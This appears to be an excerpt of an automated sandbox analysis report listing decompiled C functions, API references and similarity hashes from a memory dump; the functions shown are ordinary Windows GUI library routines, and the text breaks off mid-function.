Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: 29e1d668fda20265a78b74ca8ff026734ce6db1de397d6ac96556d2f5ca1b6a4
Instruction ID: a7b70fc3fd3ef1456ca975e5f9df7b5c87cdc74a04aac8eef73f99c59a8d215a
Opcode Fuzzy Hash: 29e1d668fda20265a78b74ca8ff026734ce6db1de397d6ac96556d2f5ca1b6a4
Instruction Fuzzy Hash: 9F113071D09276ABD724DFE6ACC4C4ABFE4F79A295353447FF60897220DA309981CB11

Uniqueness

Uniqueness Score: -1.00%

Function 100165BF, Relevance: 16.6, APIs: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E100165BF(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed int _t71;
				signed int _t84;
				struct HINSTANCE__* _t95;
				signed int _t96;
				void* _t97;
				signed int _t99;
				void* _t100;
				void* _t101;

				_t101 = __eflags;
				_push(0x24);
				E10041CDE(0x100522f5, __ebx, __edi, __esi);
				_t99 = __ecx;
				 *((intOrPtr*)(_t100 - 0x20)) = __ecx;
				 *(_t100 - 0x1c) =  *(__ecx + 0x60);
				 *(_t100 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E1001F108(__ebx, __edi, __ecx, _t101);
				_t95 =  *(_t54 + 0xc);
				_t84 = 0;
				_t102 =  *(_t99 + 0x58);
				if( *(_t99 + 0x58) != 0) {
					_t95 =  *(E1001F108(0, _t95, _t99, _t102) + 0xc);
					_t54 = LoadResource(_t95, FindResourceA(_t95,  *(_t99 + 0x58), 5));
					 *(_t100 - 0x18) = _t54;
				}
				if( *(_t100 - 0x18) != _t84) {
					_t54 = LockResource( *(_t100 - 0x18));
					 *(_t100 - 0x1c) = _t54;
				}
				if( *(_t100 - 0x1c) != _t84) {
					_t86 = _t99;
					 *(_t100 - 0x14) = E10016139(_t84, _t99, __eflags);
					E1000ECA2(__eflags);
					 *(_t100 - 0x28) =  *(_t100 - 0x28) & _t84;
					 *(_t100 - 0x2c) = _t84;
					 *(_t100 - 0x24) = _t84;
					__eflags =  *(_t100 - 0x14) - _t84;
					if(__eflags != 0) {
						__eflags =  *(_t100 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t100 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t100 - 0x14), 0);
								 *(_t100 - 0x2c) = 1;
								_t84 = E10003110();
								 *(_t100 - 0x24) = _t84;
								__eflags = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x128))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E10012311(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E1001232C(_t84, 0);
											 *(_t100 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t100 - 4) =  *(_t100 - 4) & 0x00000000;
					E10010C84(__eflags, _t99);
					_t58 = E1000EBE9(_t84, _t86,  *(_t100 - 0x14));
					_push(_t95);
					_push(_t58);
					_push( *(_t100 - 0x1c));
					_t59 = E10016409(_t84, _t99, _t95, _t99, __eflags);
					_t96 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t99 + 0x3c) & 0x00000010;
						if(( *(_t99 + 0x3c) & 0x00000010) != 0) {
							_t97 = 4;
							_t71 = E10012193(_t99);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t97 = 5;
							}
							E1000E772(_t99, _t97);
							_t96 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t99 + 0x20)) - _t96;
						if( *((intOrPtr*)(_t99 + 0x20)) != _t96) {
							E1001254C(_t99, _t96, _t96, _t96, _t96, _t96, 0x97);
						}
					}
					 *(_t100 - 4) =  *(_t100 - 4) | 0xffffffff;
					__eflags =  *(_t100 - 0x28) - _t96;
					if( *(_t100 - 0x28) != _t96) {
						E1001232C(_t84, 1);
					}
					__eflags =  *(_t100 - 0x2c) - _t96;
					if( *(_t100 - 0x2c) != _t96) {
						EnableWindow( *(_t100 - 0x14), 1);
					}
					__eflags =  *(_t100 - 0x14) - _t96;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t99 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t100 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t99 + 0x60))();
					E10016175(_t84, _t99, _t96, _t99, __eflags);
					__eflags =  *(_t99 + 0x58) - _t96;
					if( *(_t99 + 0x58) != _t96) {
						FreeResource( *(_t100 - 0x18));
					}
					_t63 =  *(_t99 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E10041D83(_t63);
				}
			}

0x100165bf
0x100165bf
0x100165c6
0x100165cb
0x100165cd
0x100165d3
0x100165d9
0x100165dc
0x100165e1
0x100165e4
0x100165e6
0x100165e9
0x100165f0
0x10016601
0x10016607
0x10016607
0x1001660d
0x10016612
0x10016618
0x10016618
0x1001661e
0x10016628
0x1001662f
0x10016632
0x10016637
0x1001663a
0x1001663d
0x10016640
0x10016643
0x1001664b
0x1001664e
0x10016659
0x1001665b
0x10016662
0x10016668
0x10016674
0x10016676
0x10016679
0x1001667b
0x1001667f
0x10016687
0x10016689
0x1001668b
0x10016692
0x10016694
0x10016698
0x1001669a
0x1001669f
0x1001669f
0x10016694
0x10016689
0x1001667b
0x1001665b
0x1001664e
0x100166a6
0x100166ab
0x100166b3
0x100166b8
0x100166b9
0x100166ba
0x100166bf
0x100166c4
0x100166c6
0x100166c8
0x100166ca
0x100166ce
0x100166d2
0x100166d5
0x100166da
0x100166df
0x100166e3
0x100166e3
0x100166e7
0x100166ec
0x100166ec
0x100166ec
0x100166ee
0x100166f1
0x100166ff
0x100166ff
0x100166f1
0x10016704
0x1001672f
0x10016732
0x10016738
0x10016738
0x1001673d
0x10016740
0x10016747
0x10016747
0x1001674d
0x10016750
0x10016758
0x1001675b
0x10016760
0x10016760
0x1001675b
0x1001676a
0x1001676f
0x10016774
0x10016777
0x1001677c
0x1001677c
0x10016782
0x00000000
0x10016620
0x10016620
0x10016785
0x1001678a
0x1001678a

APIs

__EH_prolog3_catch.LIBCMT ref: 100165C6
FindResourceA.KERNEL32(?,?,00000005), ref: 100165F9
LoadResource.KERNEL32(?,00000000), ref: 10016601

Part of subcall function 1000ECA2: UnhookWindowsHookEx.USER32(?), ref: 1000ECD2

LockResource.KERNEL32(?,00000024,1000343D,0C2BF211), ref: 10016612
GetDesktopWindow.USER32 ref: 10016645
IsWindowEnabled.USER32(?), ref: 10016653
EnableWindow.USER32(?,00000000), ref: 10016662

Part of subcall function 10012311: IsWindowEnabled.USER32(?), ref: 1001231A

Part of subcall function 1001232C: EnableWindow.USER32(?,1000343D), ref: 1001233D

EnableWindow.USER32(?,00000001), ref: 10016747
GetActiveWindow.USER32 ref: 10016752
SetActiveWindow.USER32(?,?,00000024,1000343D,0C2BF211), ref: 10016760
FreeResource.KERNEL32(?,?,00000024,1000343D,0C2BF211), ref: 1001677C

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
String ID:
API String ID: 964565984-0
Opcode ID: cc03626b79c22c55484c3602f04c2c4158fe8eea2116ec5cdd4fa1b95d928ac7
Instruction ID: 98989f0efb6eca01587c469f67ad4f1bd19e815d1cf0a92dfbd0bb18352cd480
Opcode Fuzzy Hash: cc03626b79c22c55484c3602f04c2c4158fe8eea2116ec5cdd4fa1b95d928ac7
Instruction Fuzzy Hash: 9A519A34A00615DBDB11DFA4CD89AAEBBF1EF88755F10002DE502BB2A1CB75DD80CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000EFAE, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 125
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E1000EFAE(int __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagRECT _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t61;
				int _t62;
				signed int _t64;
				int _t72;
				intOrPtr* _t84;
				struct HWND__* _t90;

				_t72 = __ecx;
				_t74 = _a28;
				_v8 = 0;
				_v12 = _a28;
				_v16 = 0;
				_v20 = 0;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x20),  &_v36);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				_t61 = _a16 & 0xffff7fff;
				_a24 = _t61;
				if(_t61 == 1) {
					_t13 =  &_v40;
					 *_t13 = _v40 & 0x00000000;
					__eflags =  *_t13;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
				_t62 = GetTopWindow( *(_t72 + 0x20));
				while(1) {
					_t90 = _t62;
					if(_t90 == 0) {
						break;
					}
					_t72 = GetDlgCtrlID(_t90);
					_t64 = E1000EC15(_t74, 0, _t90, __eflags, _t90);
					__eflags = _t72 - _a12;
					if(__eflags != 0) {
						__eflags = _t72 - _a4;
						if(__eflags >= 0) {
							__eflags = _t72 - _a8;
							if(__eflags <= 0) {
								__eflags = _t64;
								if(__eflags != 0) {
									SendMessageA(_t90, 0x361, 0,  &_v40);
								}
							}
						}
					} else {
						_v8 = _t90;
					}
					_t62 = GetWindow(_t90, 2);
				}
				if(_a24 != 1) {
					__eflags = _a12;
					if(_a12 != 0) {
						__eflags = _v8;
						if(_v8 != 0) {
							_t62 = E1000EBE9(_t72, _t74, _v8);
							__eflags = _a24 - 2;
							if(_a24 == 2) {
								_t84 = _a20;
								_v36.left = _v36.left +  *_t84;
								_v36.top = _v36.top +  *((intOrPtr*)(_t84 + 4));
								_v36.right = _v36.right -  *((intOrPtr*)(_t84 + 8));
								_t45 =  &(_v36.bottom);
								 *_t45 = _v36.bottom -  *((intOrPtr*)(_t84 + 0xc));
								__eflags =  *_t45;
							}
							__eflags = _a16 & 0x00008000;
							if((_a16 & 0x00008000) == 0) {
								 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
								_t62 = E1000CBE4( &_v40, _v8,  &_v36);
							}
						}
					}
					__eflags = _v40;
					if(_v40 != 0) {
						_t62 = EndDeferWindowPos(_v40);
					}
				} else {
					if(_a28 == 0) {
						_t62 = _a20;
						 *((intOrPtr*)(_t62 + 8)) = _v20;
						 *((intOrPtr*)(_t62 + 4)) = 0;
						 *_t62 = 0;
						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
					} else {
						_t62 = CopyRect(_a20,  &_v36);
					}
				}
				return _t62;
			}

0x1000efbd
0x1000efbf
0x1000efc3
0x1000efc6
0x1000efc9
0x1000efcc
0x1000efd1
0x1000efe3
0x1000efd3
0x1000efd6
0x1000efd7
0x1000efd8
0x1000efd9
0x1000efd9
0x1000efec
0x1000eff1
0x1000eff7
0x1000f006
0x1000f006
0x1000f006
0x1000eff9
0x1000f001
0x1000f001
0x1000f00d
0x1000f058
0x1000f058
0x1000f05c
0x00000000
0x00000000
0x1000f01f
0x1000f021
0x1000f026
0x1000f029
0x1000f030
0x1000f033
0x1000f035
0x1000f038
0x1000f03a
0x1000f03c
0x1000f049
0x1000f049
0x1000f03c
0x1000f038
0x1000f02b
0x1000f02b
0x1000f02b
0x1000f052
0x1000f052
0x1000f062
0x1000f08e
0x1000f091
0x1000f093
0x1000f096
0x1000f09b
0x1000f0a0
0x1000f0a4
0x1000f0a6
0x1000f0ab
0x1000f0b1
0x1000f0b7
0x1000f0bd
0x1000f0bd
0x1000f0bd
0x1000f0bd
0x1000f0c0
0x1000f0c7
0x1000f0d2
0x1000f0e0
0x1000f0e0
0x1000f0c7
0x1000f096
0x1000f0e5
0x1000f0e8
0x1000f0ed
0x1000f0ed
0x1000f064
0x1000f067
0x1000f078
0x1000f07e
0x1000f084
0x1000f087
0x1000f089
0x1000f069
0x1000f070
0x1000f070
0x1000f067
0x1000f0f7

APIs

GetClientRect.USER32 ref: 1000EFE3
BeginDeferWindowPos.USER32 ref: 1000EFFB
GetTopWindow.USER32(?), ref: 1000F00D
GetDlgCtrlID.USER32 ref: 1000F018
SendMessageA.USER32(00000000,00000361,00000000,00000000), ref: 1000F049
GetWindow.USER32(00000000,00000002), ref: 1000F052
CopyRect.USER32 ref: 1000F070
EndDeferWindowPos.USER32(00000000), ref: 1000F0ED

Strings

n^t, xrefs: 1000EFE3

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
String ID: n^t
API String ID: 1228040700-440804003
Opcode ID: 3a4f7973d20ef64ca41a191ec9c6e1dcf0fcf37156e070730ef893f160865471
Instruction ID: 31ecadab1469d530b4b5a6ad146886e04a80fc64f18e03dcfaec2b8c2b9439b1
Opcode Fuzzy Hash: 3a4f7973d20ef64ca41a191ec9c6e1dcf0fcf37156e070730ef893f160865471
Instruction Fuzzy Hash: 7541487190061ADFEF11DF94C8889EEB7B5FF48391F20456AE805A7215D735AE40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001427E, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001427E(void* __ecx) {
				struct HDC__* _v8;
				void* _v12;
				int _t9;
				int _t15;
				void* _t20;

				_t9 =  *0x1006c784; // 0xffffffff
				if(_t9 == 0xffffffff) {
					_v8 = GetDC(0);
					_v12 = 0;
					_t20 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
					if(_t20 != 0) {
						_v12 = SelectObject(_v8, _t20);
					}
					GetCharWidthA(_v8, 0x36, 0x36, 0x1006c784);
					if(_t20 != 0) {
						SelectObject(_v8, _v12);
						DeleteObject(_t20);
					}
					ReleaseDC(0, _v8);
					_t15 =  *0x1006c784; // 0xffffffff
					return _t15;
				}
				return _t9;
			}

0x10014285
0x1001428d
0x100142b7
0x100142ba
0x100142d0
0x100142d4
0x100142dc
0x100142dc
0x100142eb
0x100142f3
0x100142fb
0x100142fe
0x100142fe
0x10014308
0x1001430e
0x00000000
0x10014315
0x10014317

APIs

GetDC.USER32(00000000), ref: 10014299
GetSystemMetrics.USER32 ref: 100142BD
CreateFontA.GDI32(00000000), ref: 100142C4
SelectObject.GDI32(?,00000000), ref: 100142DA
GetCharWidthA.GDI32(?,00000036,00000036,1006C784), ref: 100142EB
SelectObject.GDI32(?,?), ref: 100142FB
DeleteObject.GDI32(00000000), ref: 100142FE
ReleaseDC.USER32 ref: 10014308

Strings

Marlett, xrefs: 1001429F

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
String ID: Marlett
API String ID: 1397664628-3688754224
Opcode ID: 0f774dab13c9f533842f64485bafb93aaa5a2e216e617aed5a4176d141ad84d7
Instruction ID: 17af902782a87ec528696af0f6dfb38b4c78983b4b035d1149244eb14c752399
Opcode Fuzzy Hash: 0f774dab13c9f533842f64485bafb93aaa5a2e216e617aed5a4176d141ad84d7
Instruction Fuzzy Hash: 4C115E71902134BBEB219BA69C8DDDF7E7DEF4A7A1F100110F209A71A0C7714E00DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100134E4, Relevance: 15.1, APIs: 10, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100134E4(void* __ecx, int _a4) {
				int _v8;
				struct tagRECT _v24;
				long _t39;
				int _t42;
				int _t43;
				int _t62;
				int _t66;
				void* _t68;
				long _t69;
				int _t71;

				_t69 = _a4;
				_t68 = __ecx;
				_t39 = DefWindowProcA( *(__ecx + 0x20), 0x46, 0, _t69);
				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
					GetWindowRect( *(_t68 + 0x20),  &_v24);
					_t42 = _a4;
					_t66 =  *(_t42 + 0x10);
					_t71 = _v24.right - _v24.left;
					_t62 = _v24.bottom - _v24.top;
					_t43 =  *(_t42 + 0x14);
					_v8 = _t66;
					_a4 = _t43;
					if(_t66 != _t71 && ( *(_t68 + 0x84) & 0x00000400) != 0) {
						SetRect( &_v24, _t66 -  *0x10094530, 0, _t66, _t43);
						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
						SetRect( &_v24, _t71 -  *0x10094530, 0, _t71, _a4);
						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
						_t66 = _v8;
						_t43 = _a4;
					}
					if(_t43 != _t62 && ( *(_t68 + 0x84) & 0x00000800) != 0) {
						SetRect( &_v24, 0, _t43 -  *0x10094534, _t66, _t43);
						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
						SetRect( &_v24, 0, _t62 -  *0x10094534, _v8, _t62);
						_t43 = InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
					}
					return _t43;
				}
				return _t39;
			}

0x100134ed
0x100134f4
0x100134fb
0x10013505
0x10013513
0x10013519
0x1001351f
0x10013522
0x10013528
0x1001352b
0x1001352e
0x10013531
0x10013536
0x10013553
0x10013562
0x10013579
0x10013588
0x1001358e
0x10013591
0x10013591
0x10013596
0x100135b9
0x100135c4
0x100135db
0x100135e6
0x100135e6
0x00000000
0x100135ec
0x100135f0

APIs

DefWindowProcA.USER32(?,00000046,00000000,?), ref: 100134FB
GetWindowRect.USER32 ref: 10013513
SetRect.USER32 ref: 10013553
InvalidateRect.USER32(?,?,00000001), ref: 10013562
SetRect.USER32 ref: 10013579
InvalidateRect.USER32(?,?,00000001), ref: 10013588
SetRect.USER32 ref: 100135B9
InvalidateRect.USER32(?,?,00000001), ref: 100135C4
SetRect.USER32 ref: 100135DB
InvalidateRect.USER32(?,?,00000001), ref: 100135E6

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Invalidate$Window$Proc
String ID:
API String ID: 570070710-0
Opcode ID: 634cfe1bd528e5e40d1616079124d0a94e60140adc5f0137e0f933678c829f4c
Instruction ID: 1a86a550e7521cf1eacc9320d17034d86d6daaadc7f5f1d1c103a230788d047a
Opcode Fuzzy Hash: 634cfe1bd528e5e40d1616079124d0a94e60140adc5f0137e0f933678c829f4c
Instruction Fuzzy Hash: E9310972900619BFEB04DFA4DD88FAABB7CFB08744F110115FA05A7160D771AE54CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001038B, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 69
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1001038B(void* __ebx, void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				void* __edi;
				void* _t12;
				void* _t14;
				void* _t15;
				void* _t18;
				void* _t19;
				void* _t29;
				struct HWND__* _t30;
				signed int _t34;
				void* _t37;
				void* _t41;

				_t29 = __ebx;
				_push(__ecx);
				_t37 = __ecx;
				_t12 = E10010363(__ebx, __ecx, __ecx);
				_t34 = _a4 & 0x0000fff0;
				_t41 = _t12;
				_t14 = _t34 - 0xf040;
				if(_t14 == 0) {
					L11:
					if(_a8 != 0x75 || _t41 == 0) {
						L15:
						_t15 = 0;
						goto L16;
					} else {
						E10012353(_t41);
						L14:
						_t15 = 1;
						L16:
						return _t15;
					}
				}
				_t18 = _t14 - 0x10;
				if(_t18 == 0) {
					goto L11;
				}
				_t19 = _t18 - 0x10;
				if(_t19 == 0 || _t19 == 0xa0) {
					if(_t34 == 0xf060 || _a8 != 0) {
						if(_t41 != 0) {
							_push(_t29);
							_t30 =  *(_t37 + 0x20);
							_v8 = GetFocus();
							E1000EBE9(_t30, _t34, SetActiveWindow( *(_t41 + 0x20)));
							SendMessageA( *(_t41 + 0x20), 0x112, _a4, _a8);
							if(IsWindow(_t30) != 0) {
								SetActiveWindow(_t30);
							}
							if(IsWindow(_v8) != 0) {
								SetFocus(_v8);
							}
						}
					}
					goto L14;
				} else {
					goto L15;
				}
			}

0x1001038b
0x10010390
0x10010393
0x10010395
0x1001039d
0x100103a3
0x100103a7
0x100103ac
0x1001042c
0x10010431
0x10010443
0x10010443
0x00000000
0x10010437
0x10010439
0x1001043e
0x10010440
0x10010445
0x10010448
0x10010448
0x10010431
0x100103ae
0x100103b1
0x00000000
0x00000000
0x100103b3
0x100103b6
0x100103c9
0x100103d3
0x100103d5
0x100103d6
0x100103e8
0x100103ee
0x10010401
0x10010412
0x10010415
0x10010415
0x1001041f
0x10010424
0x10010424
0x1001041f
0x100103d3
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GetFocus.USER32 ref: 100103D9
SetActiveWindow.USER32(?), ref: 100103EB
SendMessageA.USER32(?,00000112,?,?), ref: 10010401
IsWindow.USER32(?), ref: 1001040E
SetActiveWindow.USER32(?), ref: 10010415
IsWindow.USER32(?), ref: 1001041A
SetFocus.USER32(?), ref: 10010424

Strings

u, xrefs: 1001042C

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveFocus$MessageSend
String ID: u
API String ID: 1556911595-4067256894
Opcode ID: bbbd778d0d96d2a101001acba0480e1f928d5025d9b1f374b7fa318ef2402329
Instruction ID: 9bb9b293ed2b2f42baf8828aaf8da257ee6077420302d88d0ac00136ce973e85
Opcode Fuzzy Hash: bbbd778d0d96d2a101001acba0480e1f928d5025d9b1f374b7fa318ef2402329
Instruction Fuzzy Hash: 2611D672B00219A7DB20DB75CD84A5E3AA9FB44390F008024FA85DE5A5DAB4DE80DA90

Uniqueness

Uniqueness Score: -1.00%

Function 1002B081, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E1002B081(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x1006d940; // 0xc2bf211
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E1003F29E(E1002AF2D(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

0x1002b089
0x1002b090
0x1002b095
0x1002b09e
0x1002b0a1
0x1002b0a4
0x1002b0a9
0x1002b0ad
0x1002b0b7
0x1002b0c6
0x1002b0ca
0x1002b0d7
0x1002b0d9
0x1002b0db
0x1002b0db
0x1002b0f6
0x1002b0f9
0x1002b0f9
0x1002b0ff
0x1002b0ff
0x1002b105
0x1002b107
0x1002b107
0x1002b122
0x1002b122
0x1002b0b1
0x1002b0b5
0x00000000
0x00000000
0x00000000

APIs

GetStockObject.GDI32(00000011), ref: 1002B0A9
GetStockObject.GDI32(0000000D), ref: 1002B0B1
GetObjectA.GDI32(00000000,0000003C,?), ref: 1002B0BE
GetDC.USER32(00000000), ref: 1002B0CD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002B0E1
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 1002B0ED
ReleaseDC.USER32 ref: 1002B0F9

Strings

System, xrefs: 1002B0A4, 1002B10E

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: a417f1997176336137f1a6832dc477bd4f51ad97ecea9ba850fbd37229733bfc
Instruction ID: bf500c572657dfc052007db3085995021f2809bed762865c47bb2d51478c4fcb
Opcode Fuzzy Hash: a417f1997176336137f1a6832dc477bd4f51ad97ecea9ba850fbd37229733bfc
Instruction Fuzzy Hash: 13114F71641668EBEB20DBA1EC89FAF7BB8EB48781F400115FA01A71C1DF709D01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1001332E, Relevance: 13.6, APIs: 9, Instructions: 131
timekeyboardCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E1001332E(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t42;
				signed int _t49;
				struct HWND__* _t60;
				intOrPtr _t63;
				intOrPtr* _t64;
				intOrPtr _t66;
				void* _t68;
				void* _t72;
				intOrPtr* _t75;
				intOrPtr _t83;
				void* _t84;
				intOrPtr _t85;
				struct HWND__* _t87;
				intOrPtr _t88;
				intOrPtr* _t89;

				_t76 = __ecx;
				_t89 = __ecx;
				_t42 = GetKeyState(1);
				_t90 = _t42;
				if(_t42 < 0) {
					return _t42;
				}
				_t85 = E1001F13B(_t72, _t76, _t84, _t89, _t90);
				_v12 = _t85;
				GetCursorPos( &_v20);
				ScreenToClient( *(_t89 + 0x20),  &_v20);
				_t49 =  *((intOrPtr*)( *_t89 + 0x74))(_v20.x, _v20.y, 0, _t84, _t72);
				_v8 = _t49;
				if(_t49 < 0) {
